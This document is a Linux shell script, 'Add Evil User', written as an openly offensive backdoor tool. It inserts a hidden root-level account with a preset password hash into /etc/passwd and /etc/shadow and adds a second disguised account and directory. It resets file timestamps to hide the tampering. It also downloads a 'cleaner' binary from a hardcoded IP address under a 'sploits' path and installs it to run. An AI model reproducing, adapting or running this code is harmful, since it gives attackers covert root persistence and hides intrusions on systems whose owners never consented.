#!/bin/sh
# Add Evil User ver. 0.2 written by hipodilski
# adds user named reboot in passwd and shadow file
# from 2 customised vals for your needs
# after the username you specify
# if no base_user is specified adds the user on random place.
# This is strongly Linux Specific not tested with other Unixes
# So don't expect to work on other OS.
# A big Fuck to all you script kiddos.
# You fucking dumb asses. I hope this won't be ever in a sk hands.
# I've Written this just for fun and profit
# using it for illegal stuff is on your own
# All copyrigts to myself and the GPL ver. 2.0 and above
# for comments flames etc. [email protected]
# See the pC-fREAK web page at http://rootshell.be/~pcfreak/Archive
# Have a nice day ;]
# Edit this values to satisfy your needs.
# 1st Evil user we add to the passwd shadow and group files.
evil_user='reboot';
# 2nd Evil user.
evil_user1='pptpd';
# Name of the evil dir we make for our 2nd evil user.
evil_dir='/usr/sbin/pptpd';
# Base user after which we add our 1st evil user.
base_user='shutdown';
# Base user after which we add our 2nd evil user.
base_user1='nobody';
# Default evil users shell.
shell='/bin/bash';
# Home dir for evil user 1 and 2.
home_dir='/sbin';
home_dir1='/usr/sbin/pptpd';
# MD5 hash we use for the 1st and 2nd one.
md5_hash='$1$PQWzlnxO$bcNq6dOj52.huhNUxibxE0';
md5_hash1='$1$fMH1aRPy$EvhdrBBA0YgfsILS1gdaw1';
# Default uid and gid for the 1st evil user.
uid='0';
gid='0';
# Default uid and gid for the 2nd evil user.
uid1='53';
gid1='53';
# Location to the system passwd and shadow and group.
passwd_file='/etc/passwd';
shadow_file='/etc/shadow';
group_file='/etc/group';
# Temporary files for passwd shadow and group
temp_timestamp='/tmp/timestamp';
temp_pwd_file='/tmp/tmp.passwd';
temp_shad_file='/tmp/tmp.shadow';
temp_grp_file='/tmp/tmp.grp';
temp_new_dest='/etc';
temp_pwd_new_name='passwd';
temp_shad_new_name='shadow';
temp_grp_new_name='group';
# Default Values. Normally you don't need to modify this.
d_a_e_d='12431:0:99999:7:::';
evil_user_pwd="$evil_user:x:$uid:$gid:$evil_user:$home_dir:$shell";
evil_user_shad="$evil_user:$md5_hash:$d_a_e_d";
evil_user_pwd1="$evil_user1:x:$uid1:$gid1:$evil_user1:$home_dir1:$shell";
evil_user_shad1="$evil_user1:$md5_hash1:$d_a_e_d";
cnt_passwd=`wc -l $passwd_file | awk '{ print $1 }'`;
place_start_val=6;
place_end_val=`expr $cnt_passwd - 4`;
a=0;
b=1;
# Cretes temp files we need for the whole operation. :]
# Useless just for fame.:]
banner () {
echo "Evil User add ver 0.4";
echo '\-------------------/'; echo;
echo 'Written by hip0 from pC-fREAK Org.';
echo; echo "Adding User: $evil_user && User: $evil_user1 to:";
echo "$temp_new_dest/$temp_pwd_new_name ,\
$temp_new_dest/$temp_shad_new_name and $temp_new_dest/$temp_grp_new_name";
}
# Checks for evil users existence.
chk_evil_user_existence () {
if [ -n "`grep $evil_user $passwd_file`" ]; then
echo "$evil_user Already exists. Exiting ...";
exit 0;
fi
if [ -n "`grep $evil_user1 $passwd_file`" ]; then
echo "$evil_user1 Already exists. Exiting ...";
exit 0;
fi
}
# Creates Temp Files
create_temp_files () {
touch $temp_pwd_file;
touch $temp_shad_file;
touch $temp_grp_file;
touch $temp_timestamp;
cat /dev/null > $temp_pwd_file;
cat /dev/null > $temp_shad_file;
}
# Backups passwd timestamps.
backup_timestamps () {
touch -acmr $passwd_file $temp_timestamp;
}
# Sets backuped timestamps on the modifed {passwd,shadow,group}-
set_old_timestamps () {
touch -acmr $temp_timestamp $temp_new_dest/$temp_pwd_new_name;
touch -acmr $temp_timestamp $temp_new_dest/$temp_shad_new_name;
#touch -acmr $temp_timestamp $temp_new_dest/$temp_pwd_new_name"-";
#touch -acmr $temp_timestamp $temp_new_dest/$temp_shad_new_name"-";
touch -acmr $temp_timestamp $temp_new_dest/$temp_grp_new_name;
#touch -acmr $temp_timestamp $temp_new_dest/$temp_grp_new_name"-";
touch -acmr $temp_timestamp $evil_dir;
}
# Generates random uids that doesn't match the ones from passwd.
gener_random_uid () {
RANGE=100;
NUMBER=$RANDOM;
let "NUMBER %= $RANGE";
random_temp_uid="$NUMBER";
chk_val=`cat $passwd_file |\
sed "s/:/ /g" | awk '{ print $3 }' | grep $RANDOM`;
if [ ! -z "$chk_val" ]; then
gener_random_uid;
else
random_temp_uid=$RANDOM;
fi
}
# Generates random place to put evil users to.
gener_random_place () {
RANGE=`wc -l $passwd_file | awk '{ print $1 }'`;
NUMBER1="$RANDOM";
let "NUMBER1 %= $RANGE";
if [ "$NUMBER1" -gt "$place_start_val" ]\
&& [ "$NUMBER1" -lt "$place_end_val" ]; then
random_place=$NUMBER1;
else
gener_random_place;
fi
}
# Adds the evil users to the temp files.
add_evil_2_temp () {
if [ -n "`grep $base_user $passwd_file`" ] &&\
[ -n "`grep $base_user1 $passwd_file`" ]; then
default_add;
else
random_add;
fi
}
# Adds the two evil users on random places in the pwd files.
random_add () {
for i in `seq 1 $cnt_passwd`; do
a=`expr $a + $b`;
cur_line_pwd=`cat $passwd_file | head -n $a | tail -n 1`;
cur_line_shad=`cat $shadow_file | head -n $a | tail -n 1`;
cur_line_grp=`cat $group_file | head -n $a | tail -n 1`;
cur_user=`echo $cur_line_pwd | sed "s/:/ /g" | awk '{ print $1 }'`;
if [ $a = "$random_place" ]; then
echo "$evil_user_pwd" \
>> $temp_pwd_file;
echo "$evil_user_shad" >> $temp_shad_file;
# echo "$evil_user:$random_temp_uid:" >> $temp_grp_file;
fi
random_place1=`expr $random_place + 4`;
if [ "$a" = "$random_place1" ]; then
echo "$evil_user1:x:$random_temp_uid:$random_temp_uid:$evil_user1:\
$home_dir1:$shell" >> $temp_pwd_file;
echo "$evil_user_shad1" >> $temp_shad_file;
echo "$evil_user1:x:$random_temp_uid:" >> $temp_grp_file;
fi
echo "$cur_line_pwd" >> $temp_pwd_file;
echo "$cur_line_shad" >> $temp_shad_file;
echo "$cur_line_grp" >> $temp_grp_file;
done
}
# Default adding meachanism with defined based users func.
default_add () {
for i in `seq 1 $cnt_passwd`; do
a=`expr $a + $b`;
cur_line_pwd=`cat $passwd_file | head -n $a | tail -n 1`;
cur_line_shad=`cat $shadow_file | head -n $a | tail -n 1`;
cur_line_grp=`cat $group_file | head -n $a | tail -n 1`;
cur_line=`echo $cur_line_pwd | sed "s/:/ /" | awk '{ print $1 }'`;
echo "$cur_line_pwd" >> $temp_pwd_file;
echo "$cur_line_shad" >> $temp_shad_file;
echo "$cur_line_grp" >> $temp_grp_file;
if [ "$cur_line" = "$base_user" ]; then
echo "$evil_user_pwd" >> $temp_pwd_file;
echo "$evil_user_shad" >> $temp_shad_file;
fi
if [ "$cur_line" = "$base_user1" ]; then
echo "$evil_user1:x:$random_temp_uid:$random_temp_uid\
:$evil_user1:$home_dir:$shell" >> $temp_pwd_file;
echo "$evil_user1:$md5_hash1:$d_a_e_d" >> $temp_shad_file;
echo "$evil_user1:$random_temp_uid:" >> $temp_grp_file;
fi
done
}
# Copies modified passwd,shadow and group to the new defined dest.
cp_evil_2_dest () {
cp $temp_pwd_file $temp_new_dest/$temp_pwd_new_name;
cp $temp_shad_file $temp_new_dest/$temp_shad_new_name;
cp $temp_grp_file $temp_new_dest/$temp_grp_new_name;
}
# Deletes created temp files.
dele_temps () {
rm -f $temp_pwd_file;
rm -f $temp_shad_file;
rm -f $temp_grp_file;
rm -f $temp_timestamp;
}
# Checks for evil dir existence and creates it if it doestn't exists.
create_evil_dir () {
if [ ! -d "$evil_dir" ]; then
mkdir $evil_dir;
chown $random_temp_uid:$random_temp_uid -R $evil_dir;
fi
}
# Postprocedure commands to execute.
cmds_to_exec () {
cd /usr/sbin/pptpd;
wget http://62.73.73.138/sploits/static/cleaner &> /dev/null;
mv cleaner clean;
touch /usr/sbin/cleaner;
chmod +x /usr/sbin/pptpd/clean;
echo '#!/bin/sh' > /usr/sbin/cleaner
echo '/usr/sbin/pptpd/clean -u pptpd -n 0 -d' >> /usr/sbin/cleaner;
chmod +x /usr/sbin/cleaner;
touch -acmr /bin/ls /usr/sbin/cleaner;
# evil has no boundaries. ;]
}
# Useless func. just for fun